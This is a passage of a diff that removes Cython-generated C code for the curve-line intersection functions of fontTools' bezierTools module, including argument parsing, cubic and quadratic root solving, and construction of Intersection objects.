NULL; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - goto __pyx_L7_unpacking_done; - __pyx_L6_unpacking_failed:; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - __pyx_t_9 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1241, __pyx_L1_error) - __pyx_L7_unpacking_done:; - } - __pyx_v_a = __pyx_t_4; - __pyx_t_4 = 0; - __pyx_v_b = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_c = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_d = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1242 - * elif len(curve) == 4: - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) # <<<<<<<<<<<<<< - * else: - * raise ValueError("Unknown curve degree") - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_solveCubic); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_a, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_b, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_c, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_10 = __Pyx_GetItemInt(__pyx_v_d, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_11 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_11, __pyx_t_3, __pyx_t_2, __pyx_t_4, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 4+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1242, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_v_intersections = __pyx_t_8; - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":1240 - * a, b, c = calcQuadraticParameters(*aligned_curve) - * intersections = solveQuadratic(a[1], b[1], c[1]) - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * a, b, c, d = calcCubicParameters(*aligned_curve) - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1244 - * intersections = solveCubic(a[1], b[1], c[1], d[1]) - * else: - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * return sorted(i for i in intersections if 0.0 <= i <= 1) - * - */ - /*else*/ { - __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1244, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_Raise(__pyx_t_8, 0, 0, 0); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __PYX_ERR(0, 1244, __pyx_L1_error) - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":1245 - * else: - * raise ValueError("Unknown curve degree") - * return sorted(i for i in intersections if 0.0 <= i <= 1) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(NULL, __pyx_v_intersections); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_10 = __Pyx_Generator_Next(__pyx_t_1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 1245, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = ((PyObject*)__pyx_t_10); - __pyx_t_10 = 0; - __pyx_t_12 = PyList_Sort(__pyx_t_8); if (unlikely(__pyx_t_12 == ((int)-1))) __PYX_ERR(0, 1245, __pyx_L1_error) - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools._curve_line_intersections_t", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_aligned_curve); - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_intersections); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_2generator4); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_78curveLineIntersections, "curveLineIntersections(curve, line)\nFinds intersections between a curve and a line.\n\n Args:\n curve: List of coordinates of the curve segment as 2D tuples.\n line: List of coordinates of the line segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = curveLineIntersections(curve, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_79curveLineIntersections = {"curveLineIntersections", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_78curveLineIntersections}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_79curveLineIntersections(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_curve = 0; - PyObject *__pyx_v_line = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[2] = {0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("curveLineIntersections (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_curve,&__pyx_n_s_line,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_curve)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1248, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_line)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1248, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("curveLineIntersections", 1, 2, 2, 1); __PYX_ERR(0, 1248, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "curveLineIntersections") < 0)) __PYX_ERR(0, 1248, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 2)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - } - __pyx_v_curve = values[0]; - __pyx_v_line = values[1]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("curveLineIntersections", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 1248, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.curveLineIntersections", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(__pyx_self, __pyx_v_curve, __pyx_v_line); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line) { - PyObject *__pyx_v_pointFinder = NULL; - PyObject *__pyx_v_intersections = NULL; - PyObject *__pyx_v_t = NULL; - PyObject *__pyx_v_pt = NULL; - PyObject *__pyx_v_line_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - Py_ssize_t __pyx_t_1; - int __pyx_t_2; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - int __pyx_t_6; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - PyObject *__pyx_t_9 = NULL; - int __pyx_t_10; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("curveLineIntersections", 1); - - /* "fontTools/misc/bezierTools.py":1269 - * (84.9000930760723, 189.87306176459828) - * """ - * if len(curve) == 3: # <<<<<<<<<<<<<< - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1269, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 3); - if (__pyx_t_2) { - - /* "fontTools/misc/bezierTools.py":1270 - * """ - * if len(curve) == 3: - * pointFinder = quadraticPointAtT # <<<<<<<<<<<<<< - * elif len(curve) == 4: - * pointFinder = cubicPointAtT - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_quadraticPointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1270, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_pointFinder = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1269 - * (84.9000930760723, 189.87306176459828) - * """ - * if len(curve) == 3: # <<<<<<<<<<<<<< - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1271 - * if len(curve) == 3: - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * pointFinder = cubicPointAtT - * else: - */ - __pyx_t_1 = PyObject_Length(__pyx_v_curve); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(0, 1271, __pyx_L1_error) - __pyx_t_2 = (__pyx_t_1 == 4); - if (likely(__pyx_t_2)) { - - /* "fontTools/misc/bezierTools.py":1272 - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: - * pointFinder = cubicPointAtT # <<<<<<<<<<<<<< - * else: - * raise ValueError("Unknown curve degree") - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_cubicPointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1272, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_pointFinder = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1271 - * if len(curve) == 3: - * pointFinder = quadraticPointAtT - * elif len(curve) == 4: # <<<<<<<<<<<<<< - * pointFinder = cubicPointAtT - * else: - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":1274 - * pointFinder = cubicPointAtT - * else: - * raise ValueError("Unknown curve degree") # <<<<<<<<<<<<<< - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): - */ - /*else*/ { - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_ValueError, __pyx_tuple__4, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1274, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_Raise(__pyx_t_3, 0, 0, 0); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __PYX_ERR(0, 1274, __pyx_L1_error) - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":1275 - * else: - * raise ValueError("Unknown curve degree") - * intersections = [] # <<<<<<<<<<<<<< - * for t in _curve_line_intersections_t(curve, line): - * pt = pointFinder(*curve, t) - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1275, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_v_intersections = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1276 - * raise ValueError("Unknown curve degree") - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * pt = pointFinder(*curve, t) - * # Back-project the point onto the line, to avoid problems with - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_curve_line_intersections_t); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_5)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_5); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_curve, __pyx_v_line}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_3)) || PyTuple_CheckExact(__pyx_t_3)) { - __pyx_t_4 = __pyx_t_3; __Pyx_INCREF(__pyx_t_4); - __pyx_t_1 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_1 = -1; __pyx_t_4 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1276, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_4))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_4); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #endif - if (__pyx_t_1 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyList_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_3); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_4); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #endif - if (__pyx_t_1 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_3 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_1); __Pyx_INCREF(__pyx_t_3); __pyx_t_1++; if (unlikely((0 < 0))) __PYX_ERR(0, 1276, __pyx_L1_error) - #else - __pyx_t_3 = __Pyx_PySequence_ITEM(__pyx_t_4, __pyx_t_1); __pyx_t_1++; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1276, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - } - } else { - __pyx_t_3 = __pyx_t_7(__pyx_t_4); - if (unlikely(!__pyx_t_3)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 1276, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_3); - } - __Pyx_XDECREF_SET(__pyx_v_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1277 - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): - * pt = pointFinder(*curve, t) # <<<<<<<<<<<<<< - * # Back-project the point onto the line, to avoid problems with - * # numerical accuracy in the case of vertical and horizontal lines - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_curve); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_t); - __Pyx_GIVEREF(__pyx_v_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_t)) __PYX_ERR(0, 1277, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_3, __pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_v_pointFinder, __pyx_t_8, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1277, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1280 - * # Back-project the point onto the line, to avoid problems with - * # numerical accuracy in the case of vertical and horizontal lines - * line_t = _line_t_of_pt(*line, pt) # <<<<<<<<<<<<<< - * pt = linePointAtT(*line, line_t) - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = __Pyx_PySequence_Tuple(__pyx_v_line); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_pt); - __Pyx_GIVEREF(__pyx_v_pt); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_pt)) __PYX_ERR(0, 1280, __pyx_L1_error); - __pyx_t_9 = PyNumber_Add(__pyx_t_8, __pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_9, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1280, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_XDECREF_SET(__pyx_v_line_t, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1281 - * # numerical accuracy in the case of vertical and horizontal lines - * line_t = _line_t_of_pt(*line, pt) - * pt = linePointAtT(*line, line_t) # <<<<<<<<<<<<<< - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - * return intersections - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_linePointAtT); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_9 = __Pyx_PySequence_Tuple(__pyx_v_line); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_line_t); - __Pyx_GIVEREF(__pyx_v_line_t); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_line_t)) __PYX_ERR(0, 1281, __pyx_L1_error); - __pyx_t_8 = PyNumber_Add(__pyx_t_9, __pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_8, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1281, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF_SET(__pyx_v_pt, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":1282 - * line_t = _line_t_of_pt(*line, pt) - * pt = linePointAtT(*line, line_t) - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) # <<<<<<<<<<<<<< - * return intersections - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_t1, __pyx_v_t) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_8, __pyx_n_s_t2, __pyx_v_line_t) < 0) __PYX_ERR(0, 1282, __pyx_L1_error) - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_empty_tuple, __pyx_t_8); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_10 = __Pyx_PyList_Append(__pyx_v_intersections, __pyx_t_3); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(0, 1282, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1276 - * raise ValueError("Unknown curve degree") - * intersections = [] - * for t in _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * pt = pointFinder(*curve, t) - * # Back-project the point onto the line, to avoid problems with - */ - } - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":1283 - * pt = linePointAtT(*line, line_t) - * intersections.append(Intersection(pt=pt, t1=t, t2=line_t)) - * return intersections # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_intersections); - __pyx_r = __pyx_v_intersections; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * 